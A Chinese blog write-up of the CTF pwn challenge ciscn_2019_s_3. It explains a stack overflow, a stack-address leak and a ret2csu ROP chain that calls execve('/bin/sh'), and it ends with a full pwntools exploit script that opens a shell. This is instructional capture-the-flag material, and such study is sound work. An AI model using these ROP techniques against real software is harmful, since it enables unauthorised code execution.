【Pwn】ciscn_2019_s_3 wp 解析(bin/sh+0x50)

已于 2022-05-09 01:22:28 修改
阅读量1k 收藏 8
点赞数 2
分类专栏: 个人日记 文章标签: 安全 python 系统安全
于 2022-05-09 00:56:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcw_linyx/article/details/124656798
版权

前言

这里就不解说pwn题的基本分析流程了

  1. file
  2. checksec
  3. ida

本题用到了ret2csu
参考ctf wiki 中级 ROP
我做的时候还不知道有这个叫法 >_<,也只调用了里面的loc_400580:
请添加图片描述

正文

分析

首先我们可以发现栈溢出,我们可输入0x400大小的数据
请添加图片描述
其中

mov     rbp, rsp #

rbp=rsp ,没有sub 等指令调整rsp,rbp,也没有ret -->rbp即返回地址

syscall调用read函数或者write函数 是通过rax控制的
rax=0时 read
rax=1时 write

函数区有一个特别的函数gadgets:
请添加图片描述
我们知道,
execve的系统调用号位59(0x3b)
那么这里就是利用点
我们尝试去构造execve(“/bin/sh”,0,0) 去拿到shell

emm,64位程序,那么对应参数就是:
rax=59,rsi=“/bin/sh”,rdi=0,rdx=0,ret=syscall

我们就需要控制如上寄存器!!

寻找/bin/sh

请添加图片描述程序里面不存在“/bin/sh”

那么我们就需要通过read函数写入/bin/sh

调试:

  • buf大小为0x10 写入“aaaa”

请添加图片描述
由vuln函数中的lea rsi, [rsp+buf]可知,rsi记录buf的地址
请添加图片描述write输出为0x30大小的数据
虽然开启了保护,每次栈的内存都不同,但是栈内的偏移是相同
我们需要找一个栈上存在固定偏移的的地址,且可被输出

  • 查看栈内容

请添加图片描述
此处

0x7fffffffde80:	0x00007f0a61616161  0x0000000000000000 # 前8字节为aaaa,
0x7fffffffde90:	0x00007fffffffdeb0	0x0000000000400536 # 前8字节为rbp,rsp,后面400536为nop指令
0x7fffffffdea0:	0x00007fffffffdf98	0x0000000100000000 # 前8字节为栈上地址

0x7fffffffdea0是输出的第0x28

  • 计算与栈的距离:0x118

请添加图片描述

可利用gadget:

请添加图片描述

编写exp及分析

第一次进入vuln:

#覆盖buf 使rbp也就是返回地址为vuln
payload=b"/bin/sh\x00"*2+p64(vuln)

io.sendline(payload)
# 先接收0x20个大小数据
io.recv(0x20)
# 再接收我们需要的栈上地址
stack_add=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#print(hex(stack_add))
bin_sh=stack_add-0x118

第二次进入vuln:

  1. 先覆盖buf前8字节,后面8字节我们可以随意覆盖,也可以覆盖我们想写入的地址,这个地址是可利用的!再返回rbp_r12_r13_r14_r15_ret

  2. 给rbp,r12,r13,r14,r15寄存器传入对应参数:


payload=b"/bin/sh\x00"+p64(rdi_ret)+p64(rbp_r12_r13_r14_r15_ret)
payload+=p64(0x1)+p64(bin_sh+0x8)+p64(0)+p64(0)+p64(bin_sh)#r12=bin_sh+0x50 also success
payload+=p64(mov_rdx_r13)+p64(mov_rax)+p64(rdi_ret)+p64(bin_sh)+p64(sys_call)

io.sendline(payload)

loc_400580中:

.text:0000000000400580                 mov     rdx, r13
.text:0000000000400583                 mov     rsi, r14
.text:0000000000400586                 mov     edi, r15d
.text:0000000000400589                 call    qword ptr [r12+rbx*8]
.text:000000000040058D                 add     rbx, 1
.text:0000000000400591                 cmp     rbx, rbp
.text:0000000000400594                 jnz     short loc_400580
1.通过调试,rbx在此处为0,那么我们需要使rbp=0x1,从而结束循环,再使 r13=0,r14=0,r15=bin_sh
2.但是edi为rdi的低32位,r15d为r15的低32位,所以无法传入完整的bin_sh地址,这里可以随便写,后面再调用rdi_ret使rdi=bin_sh
3.执行到call时,调用的是r12对应地址里的指令(rbx=0),所以r12应设置为我们想调用的指令地址
4.调用loc_400580后,设置rax为59,rsi=/bin/sh,再调用syscall,从而实现execve(“/bin/sh”,0,0)

注意

  1. b"/bin/sh\x00"+p64(rdi_ret),后8位我设置的rdi_ret的地址
  2. p64(bin_sh+0x8),这是传入r12的参数

这里为什么这样写呢?

因为[bin_sh+0x8]=0x00000000004005a3=rdi_ret
bin_sh+0x8地址处保存的是rdi_ret的地址,那么大家就懂了吧~
其实bin_sh+0x50地址处保存的也是rdi_ret的地址,只不过我是通过手动控制栈内容并调用它,而后者是程序执行时载入了这个地址,也是可调用的

调试:
  • 第一次进入vuln,并发送payload1时

请添加图片描述

  • 我们发现此时bin_sh+0x50并未载入rdi_ret的地址

请添加图片描述

  • 第二次进入vuln时,我们发现buf后的内容都变了,栈发生了变化,bin_sh+0x50载入了rdi_ret的地址,那么我们就可以通过此地址调用rdi_ret啦!

请添加图片描述

完整exp:

from pwn import*

context(os='linux', arch='amd64', log_level='debug')

io=process('./ciscn_s_3')
#io=remote('node4.buuoj.cn',28518)

elf=ELF('./ciscn_s_3')

vuln=elf.sym['vuln']

mov_rax=0x00000000004004E2  #rax=59
mov_rdx_r13=0x0000000000400580 # loc_400580
rbp_r12_r13_r14_r15_ret=0x000000000040059b #libc_csu
sys_call=0x0000000000400517
rdi_ret=0x00000000004005a3

payload=b"/bin/sh\x00"*2+p64(vuln)

io.sendline(payload)
io.recv(0x20)

stack_add=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

print(hex(stack_add))

bin_sh=stack_add-0x118

#pause()
#gdb.attach(io,"b *0x400519")

payload=b"/bin/sh\x00"+p64(rdi_ret)+p64(rbp_r12_r13_r14_r15_ret)
payload+=p64(0x1)+p64(bin_sh+0x8)+p64(0x0)+p64(0)+p64(bin_sh)#r12=bin_sh+0x50 also success
payload+=p64(mov_rdx_r13)+p64(mov_rax)+p64(rdi_ret)+p64(bin_sh)+p64(sys_call)

io.sendline(payload)
io.interactive()
1ce0range
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1341
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
ciscn_2019_s_3
qq_45691294的博客
12-29 2127
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 461
ciscn_2019_s_3
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 403
本题难点:对栈的理解需要稍微更深入一点。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 346
64位,开启了NX保护 main函数调用了vuln
BUUCTF刷题之路-ciscn_2019_s_31
qq_30528603的博客
05-31 332
既然是栈溢出嘛,我们当然想调用system('/bin/sh')很可惜的是程序中没有给出,那就考虑是不是ret2libc,但是程序中我们并没有发现存在泄漏got表的代码,在看一眼函数列表我们看到了一个程序必带的初始化函数:_libc_csu_init这是做csu题目的基础。首先rax=59并且syscall的地址我们都已经有了,接着我们看如何构造bin/sh,我尝试过在程序中查找字符串,并没有结果,那么我们只能通过read函数写进去,并且我们准确把握写入的位置以便利用,所以我们需要泄露栈地址。
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1464
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 1879
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
ciscn_2019_s_1
z1r0的博客
03-17 724
ciscn_2019_s_1 查看保护 申请的大小在0x7f-0x100之间 key1有限制,还有一个off-by-null key2不为0可以调用show这个函数 攻击思路:edit中有一个off-by-null,key1和key2都被限制了。其实攻击思路还挺明确的,因为heap是一个list,保护没有开pie,所以可以使用unlink来申请地址 1.首先肯定是要填充满tcache的,因为不是tcache的话,unlink不是双链表 2.接着考虑将unlink申请到哪里 在bss段这里可以看到有
2022CISCN部分wp misc pwn
qq_42951211的博客
06-03 805
2022CISCN部分wp
pwn ciscn_2019_s_3
beaster1的博客
03-23 191
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过计算偏移量得到libc的基址,进而计算出system函数和/bin/sh字符串的地址。最后,通过构造ROP链来调用system函数,并将/bin/sh字符串作为参数传入,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [[BUUCTF]PWN&mdash;&mdash;xdctf2015_pwn200](https://blog.csdn.net/mcmuyanga/article/details/109622553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_pwn200](https://blog.csdn.net/weixin_44309300/article/details/130628776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值